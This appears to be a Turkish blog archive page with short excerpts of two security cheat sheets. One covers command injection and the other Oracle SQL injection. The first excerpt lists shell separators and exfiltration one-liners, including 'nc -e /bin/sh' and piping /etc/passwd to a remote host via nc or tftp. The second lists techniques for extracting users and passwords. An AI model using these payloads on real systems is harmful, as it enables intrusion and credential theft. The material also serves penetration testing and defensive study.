Arşiv

Günlük Okunma : 66 | 20.07.2008

Short, yet quite useful command injection cheat sheet. Executing Commands Seperating Commands: blah;blah2 PIPE: blah | blah2 PIPEZ: blah ^ blah2 AND: blah && blah2 OR: FAIL || X OR: blah%0Dblah2%0Dblah3 Backtick: `blah` Background: `blah & blah2` Getting Files / Data FTP: Make a new text, and echo and then redirect to FTP NC: nc -e /bin/sh NC: echo /etc/passwd  | nc host port TFTP: echo put /etc/passwd | tftp host WGET: wget --post-f......

Günlük Okunma : 48 | 02.10.2007

Introduction ORACLE SQL Injection Notes Concatenation Comments Casting Strings without Quotes Getting Stuff Getting Tables Getting Columns Getting Current Database Name Getting Users and Passwords Getting Version Getting Current User Simple Union Query Simulating SQL Server's TOP feature Moving Records one by one Functions useful for Blind SQL Injection Doing outbound connections References, Credits, Thanks & Document History Introduction Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This chea......